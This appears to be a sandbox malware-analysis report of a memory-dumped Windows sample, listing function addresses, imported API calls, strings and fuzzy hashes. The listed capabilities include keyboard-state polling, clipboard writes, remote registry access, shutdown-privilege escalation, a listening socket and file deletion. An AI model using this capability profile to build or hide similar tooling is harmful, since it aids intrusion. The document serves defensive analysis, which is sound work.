FindFirstFileW.KERNEL32(*.*,?), ref: 00671D2D
_wcscmp.LIBCMT ref: 00671D54
_wcscmp.LIBCMT ref: 00671D6B
SetCurrentDirectoryW.KERNEL32(?), ref: 00671D7D
SetCurrentDirectoryW.KERNEL32(006D39FC), ref: 00671D9B
FindNextFileW.KERNEL32(00000000,00000010), ref: 00671DA5
FindClose.KERNEL32(00000000), ref: 00671DB2
FindClose.KERNEL32(00000000), ref: 00671DC2

Strings

*.*, xrefs: 00671D28

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 1824444939-438819550
Opcode ID: 823bdfea183ac57ac335d109dde0cb926e6b4d1534beca68e6fe564470b884c3
Instruction ID: f20f9792acfadcdca29773d16b2f512c9d39e387a968a4eacee2c8b150d86f4d
Opcode Fuzzy Hash: 823bdfea183ac57ac335d109dde0cb926e6b4d1534beca68e6fe564470b884c3
Instruction Fuzzy Hash: 2031F832500619AACF21AFA4DC59ADE77AF9F07320F108557F819AA290DB70DF85CE54

Function 00627D19 Relevance: 23.7, APIs: 2, Strings: 11, Instructions: 962COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00627DBD

Strings

\, xrefs: 00627D89
[, xrefs: 00627E14
\b(?<=\w), xrefs: 0069F877
\b(?=\w), xrefs: 0069F85E
Q\E, xrefs: 006286D6
^, xrefs: 00627D96
[:<:]], xrefs: 00627D1D
[:>:]], xrefs: 00627D37
\, xrefs: 0069F95B
], xrefs: 00627D9F
\, xrefs: 00627E1D

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: _memset
String ID: Q\E$[$[:<:]]$[:>:]]$\$\$\$\b(?<=\w)$\b(?=\w)$]$^
API String ID: 2102423945-2023335898
Opcode ID: 9d067302b5c7d7c9ae24107ce0258525aedbd8519449b7fee6ed905f85d4a6a1
Instruction ID: 6be0b0ce8425d2358a9c03b1c4eb71bc3b219016e92743ce74794190b0f5aada
Opcode Fuzzy Hash: 9d067302b5c7d7c9ae24107ce0258525aedbd8519449b7fee6ed905f85d4a6a1
Instruction Fuzzy Hash: 2382AE71D04229DBCF24CF98D880AEDB7B6BF44310F2581AAD859AB751E7749D81CF90

Function 0067091D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 006709DF
SystemTimeToFileTime.KERNEL32(?,?), ref: 006709EF
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 006709FB
__wsplitpath.LIBCMT ref: 00670A59
_wcscat.LIBCMT ref: 00670A71
_wcscat.LIBCMT ref: 00670A83
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00670A98
SetCurrentDirectoryW.KERNEL32(?), ref: 00670AAC
SetCurrentDirectoryW.KERNEL32(?), ref: 00670ADE
SetCurrentDirectoryW.KERNEL32(?), ref: 00670AFF
_wcscpy.LIBCMT ref: 00670B0B
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00670B4A

Strings

*.*, xrefs: 00670B05

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
String ID: *.*
API String ID: 3566783562-438819550
Opcode ID: ff826960acfd6c7b48796ce00b5ebf70dec17d718078bffc3e20c9299bca6208
Instruction ID: ac1e2b99f91ae1e3a5216c97284074c427e1bbca786d569d07b53b25829a900e
Opcode Fuzzy Hash: ff826960acfd6c7b48796ce00b5ebf70dec17d718078bffc3e20c9299bca6208
Instruction Fuzzy Hash: 106148B25043059FDB50EF60C84599EB3EAFF89314F04891EFA89C7251DB31EA45CBA6

Function 0065A66C Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0065ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0065ABD7
Part of subcall function 0065ABBB: GetLastError.KERNEL32(?,0065A69F,?,?,?), ref: 0065ABE1
Part of subcall function 0065ABBB: GetProcessHeap.KERNEL32(00000008,?,?,0065A69F,?,?,?), ref: 0065ABF0
Part of subcall function 0065ABBB: HeapAlloc.KERNEL32(00000000,?,0065A69F,?,?,?), ref: 0065ABF7
Part of subcall function 0065ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0065AC0E

Part of subcall function 0065AC56: GetProcessHeap.KERNEL32(00000008,0065A6B5,00000000,00000000,?,0065A6B5,?), ref: 0065AC62
Part of subcall function 0065AC56: HeapAlloc.KERNEL32(00000000,?,0065A6B5,?), ref: 0065AC69
Part of subcall function 0065AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0065A6B5,?), ref: 0065AC7A

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0065A6D0
_memset.LIBCMT ref: 0065A6E5
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0065A704
GetLengthSid.ADVAPI32(?), ref: 0065A715
GetAce.ADVAPI32(?,00000000,?), ref: 0065A752
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0065A76E
GetLengthSid.ADVAPI32(?), ref: 0065A78B
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0065A79A
HeapAlloc.KERNEL32(00000000), ref: 0065A7A1
GetLengthSid.ADVAPI32(?,00000008,?), ref: 0065A7C2
CopySid.ADVAPI32(00000000), ref: 0065A7C9
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0065A7FA
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0065A820
SetUserObjectSecurity.USER32(?,00000004,?), ref: 0065A834

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: 157e726e4b71b84ac9672d93c18efbf06b464456747cb0647d1363b2314bebdb
Instruction ID: a8dd47ca9f527ee7d4249234fbd322da054448ce1c5f2e4787ffc293a73fb858
Opcode Fuzzy Hash: 157e726e4b71b84ac9672d93c18efbf06b464456747cb0647d1363b2314bebdb
Instruction Fuzzy Hash: 92514C71900209AFDF10DFA5DC44AEEBBBAFF05305F048229F911A7290DB34AA09CF61

Function 00626F07 Relevance: 20.9, Strings: 16, Instructions: 883COMMON

Download Yara Rule

Strings

ANY), xrefs: 006A2E60
CRLF), xrefs: 006A2E43
LIMIT_MATCH=, xrefs: 006A2CF2
ANYCRLF), xrefs: 006A2E7D
BSR_ANYCRLF), xrefs: 006A2EA0
l, xrefs: 00626F77
NO_AUTO_POSSESS), xrefs: 006A2CB0
lll l, xrefs: 00627096, 0062709C
LIMIT_RECURSION=, xrefs: 006A2D7E
UCP), xrefs: 006A2C8F
UTF), xrefs: 006A2C7C
UTF16), xrefs: 006A2C56
BSR_UNICODE), xrefs: 006A2EBA
CR), xrefs: 006A2E09
LF), xrefs: 006A2E26
NO_START_OPT), xrefs: 006A2CD1

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID:
String ID: l$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$lll l
API String ID: 0-908078634
Opcode ID: a8016ce498e1d57ddf49bec7c3b135d57be524ba8ee299c897453bf01c1e40e9
Instruction ID: 23c75ffb557133e79f9d38fbf6f45df3ada96bcd610b0872345e517ac9a78731
Opcode Fuzzy Hash: a8016ce498e1d57ddf49bec7c3b135d57be524ba8ee299c897453bf01c1e40e9
Instruction Fuzzy Hash: A7727F71E0462A8BDB14DF58D890BEEB7B6BF49310F14416AE805EB380DB749E81DF94

Function 006663F9 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 89fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00666EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00665FA6,?), ref: 00666ED8

Part of subcall function 006672CB: GetFileAttributesW.KERNEL32(?,00666019), ref: 006672CC

_wcscat.LIBCMT ref: 00666441
__wsplitpath.LIBCMT ref: 0066645F
FindFirstFileW.KERNEL32(?,?), ref: 00666474
_wcscpy.LIBCMT ref: 006664A3
_wcscat.LIBCMT ref: 006664B8
_wcscat.LIBCMT ref: 006664CA
DeleteFileW.KERNEL32(?), ref: 006664DA
FindNextFileW.KERNEL32(00000000,00000010), ref: 006664EB
FindClose.KERNEL32(00000000), ref: 00666506

Strings

\*.*, xrefs: 0066643B

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
String ID: \*.*
API String ID: 2643075503-1173974218
Opcode ID: 9a90bb0f0cf2e22086fb7f13ea6a90b4157e124a5d6415875b94d3d8d4a0bc63
Instruction ID: b2c8ea56dc2d385374e15ad2cdf2cb15838f75f9dcb389029578262375559ff5
Opcode Fuzzy Hash: 9a90bb0f0cf2e22086fb7f13ea6a90b4157e124a5d6415875b94d3d8d4a0bc63
Instruction Fuzzy Hash: 5C31C5B240C384AAC721EBA4C8859DB77DDAF56304F00492EF6D9C3141EA35E50DC7A7

Function 006831BC Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00683C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00682BB5,?,?), ref: 00683C1D

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0068328E

Part of subcall function 0062936C: __swprintf.LIBCMT ref: 006293AB
Part of subcall function 0062936C: __itow.LIBCMT ref: 006293DF

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0068332D
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 006833C5
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00683604
RegCloseKey.ADVAPI32(00000000), ref: 00683611

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: 10c8a7fb84807068851d06684be1337e24c57dafb5a1b246ac0b988e2bc31d9e
Instruction ID: bc4aac70c67fe4b172818acf137f25a3d32832639fb0ce86c7712a22af29a29d
Opcode Fuzzy Hash: 10c8a7fb84807068851d06684be1337e24c57dafb5a1b246ac0b988e2bc31d9e
Instruction Fuzzy Hash: B2E15C31604220AFCB14EF28C991D6ABBE6EF89714F04855DF44AD7361DB30EA05CF56

Function 00662B37 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00662B5F
GetAsyncKeyState.USER32(000000A0), ref: 00662BE0
GetKeyState.USER32(000000A0), ref: 00662BFB
GetAsyncKeyState.USER32(000000A1), ref: 00662C15
GetKeyState.USER32(000000A1), ref: 00662C2A
GetAsyncKeyState.USER32(00000011), ref: 00662C42
GetKeyState.USER32(00000011), ref: 00662C54
GetAsyncKeyState.USER32(00000012), ref: 00662C6C
GetKeyState.USER32(00000012), ref: 00662C7E
GetAsyncKeyState.USER32(0000005B), ref: 00662C96
GetKeyState.USER32(0000005B), ref: 00662CA8

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 4bbc6f5d5174a916e99b00e899327f27a8ba2f1ec61623ad49e9e8a254bd1387
Instruction ID: 7d22fa9c3814139b409981ab5298dc2aa277a7490b7e6c4ee8ed52af532220f5
Opcode Fuzzy Hash: 4bbc6f5d5174a916e99b00e899327f27a8ba2f1ec61623ad49e9e8a254bd1387
Instruction Fuzzy Hash: 7D41E734904FCB6DFF749B6088643F9BEA2AF22348F048059D9C6567C1DB9499C4C7A2

Function 00676D07 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00676D2E
EmptyClipboard.USER32 ref: 00676D34
GlobalAlloc.KERNEL32(00000002,?), ref: 00676D49
CloseClipboard.USER32 ref: 00676DE8

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 3079903ffe4ae509496b10f1b8b0fd068240483606792826c2bfd739033b0a8f
Instruction ID: b94f527123de288441fe7ba0476ae3ae6ba2ca9461c8b12035fbae890d3faeb7
Opcode Fuzzy Hash: 3079903ffe4ae509496b10f1b8b0fd068240483606792826c2bfd739033b0a8f
Instruction Fuzzy Hash: 13218931300610AFDB11AF64DC59B6DB7AAEF45720F04A01AF94A9B2A1DB30F9018F98

Function 0067C18C Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 232COMMON

Download Yara Rule

APIs

Part of subcall function 00659ABF: CLSIDFromProgID.OLE32 ref: 00659ADC
Part of subcall function 00659ABF: ProgIDFromCLSID.OLE32(?,00000000), ref: 00659AF7
Part of subcall function 00659ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 00659B05
Part of subcall function 00659ABF: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00659B15

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 0067C235
_memset.LIBCMT ref: 0067C242
_memset.LIBCMT ref: 0067C360
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 0067C38C
CoTaskMemFree.OLE32(?), ref: 0067C397

Strings

NULL Pointer assignment, xrefs: 0067C3E5

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
String ID: NULL Pointer assignment
API String ID: 1300414916-2785691316
Opcode ID: 3511af34a86c34dc3be1078c5e7ec31ef6477c79e385f3ce4012d48f915a3346
Instruction ID: 7ae01fec3c8716ca4b77439d79dede84c7e788693256da2f411cffb0141c074e
Opcode Fuzzy Hash: 3511af34a86c34dc3be1078c5e7ec31ef6477c79e385f3ce4012d48f915a3346
Instruction Fuzzy Hash: C6912C71D00228ABDB10DF94DC95EDEBBBAEF04720F10815EF919A7291DB709A45CFA4

Function 006679D3 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 0065B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0065B180
Part of subcall function 0065B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0065B1AD
Part of subcall function 0065B134: GetLastError.KERNEL32 ref: 0065B1BA

ExitWindowsEx.USER32(?,00000000), ref: 00667A0F

Strings

SeShutdownPrivilege, xrefs: 006679DD
, xrefs: 006679FD
@, xrefs: 00667A02

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $@$SeShutdownPrivilege
API String ID: 2234035333-194228
Opcode ID: 7955584c9d9998ca64f104c4f794b05c98bb5c0d92942e3c9b2cc6414808949a
Instruction ID: b4be15fbb3a3ddbb11f2781d223a7e97a0d779859f6a26b023a20ccbbcc41d66
Opcode Fuzzy Hash: 7955584c9d9998ca64f104c4f794b05c98bb5c0d92942e3c9b2cc6414808949a
Instruction Fuzzy Hash: AF012B716582226AF72827F4CC4BBFF325B9B00358F241528FD13E22C2DA615F0195B4

Function 00678C4F Relevance: 9.1, APIs: 6, Instructions: 83networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006), ref: 00678CA8
WSAGetLastError.WSOCK32(00000000), ref: 00678CB7
bind.WSOCK32(00000000,?,00000010), ref: 00678CD3
listen.WSOCK32(00000000,00000005), ref: 00678CE2
WSAGetLastError.WSOCK32(00000000), ref: 00678CFC
closesocket.WSOCK32(00000000), ref: 00678D10

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: 6e9a7ee6c80b9d2cf5e6a3112263d0381bab5d7e97c5b10bdd21ea3a98654d9b
Instruction ID: 301253ece41b6a10d5550ce4fee43251cb08c24c510d13fdd4081618cc947bbb
Opcode Fuzzy Hash: 6e9a7ee6c80b9d2cf5e6a3112263d0381bab5d7e97c5b10bdd21ea3a98654d9b
Instruction Fuzzy Hash: 9A21CE316006119FCB14EF68D949A6EB7AAAF49320F149158E95BA73D2CB30AD018F65

Function 00666532 Relevance: 9.1, APIs: 6, Instructions: 71processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00666554
Process32FirstW.KERNEL32(00000000,0000022C), ref: 00666564
Process32NextW.KERNEL32(00000000,0000022C), ref: 00666583
__wsplitpath.LIBCMT ref: 006665A7
_wcscat.LIBCMT ref: 006665BA
CloseHandle.KERNEL32(00000000,?,00000000), ref: 006665F9

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
String ID:
API String ID: 1605983538-0
Opcode ID: 963f03b8ecf3a593010765469e6dead26edbd85a54215b2770e233c97200dc35
Instruction ID: be33b94469c5b6b5862f5394844d1418be3020ae9d11f5c310460df8461264bb
Opcode Fuzzy Hash: 963f03b8ecf3a593010765469e6dead26edbd85a54215b2770e233c97200dc35
Instruction Fuzzy Hash: A8218771900218ABDB10ABA4DC89FEDB7BEAB45300F5004A9F506D7241DB71AF85CF61

Function 00629B60 Relevance: 8.6, Strings: 6, Instructions: 1055COMMON

Download Yara Rule

Strings

ERCP, xrefs: 00629C32
l, xrefs: 00629CF3
VUUU, xrefs: 006ABE14
VUUU, xrefs: 00629E95
VUUU, xrefs: 00629ED4
VUUU, xrefs: 00629EA7

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID:
String ID: ERCP$VUUU$VUUU$VUUU$VUUU$l
API String ID: 0-3688285930
Opcode ID: 6e34e2993d07d64a5e7afd3d61454d0c3ff6dc9c40dbf0b8e234b1f21e7e6a25
Instruction ID: 8a5cd5d1eb6f65cd32afd2ea128d6f418451499c39b404999c31e6009db1c390
Opcode Fuzzy Hash: 6e34e2993d07d64a5e7afd3d61454d0c3ff6dc9c40dbf0b8e234b1f21e7e6a25
Instruction Fuzzy Hash: A7929B71A0062ACBDF24DF98D8407EDB7B3BB95314F14819AE816AB381D7719E81CF91

Function 006613CA Relevance: 8.1, APIs: 1, Strings: 4, Instructions: 560stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 006613DC

Strings

<2m, xrefs: 006616FA
,2m, xrefs: 006616B1
|, xrefs: 0066140C
(, xrefs: 00661422

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: lstrlen
String ID: ($,2m$<2m$|
API String ID: 1659193697-314102281
Opcode ID: 1ae85254a74b87ce24020f3967ccf7c30205ecbdc2c3e31a71cd4fc5911afacd
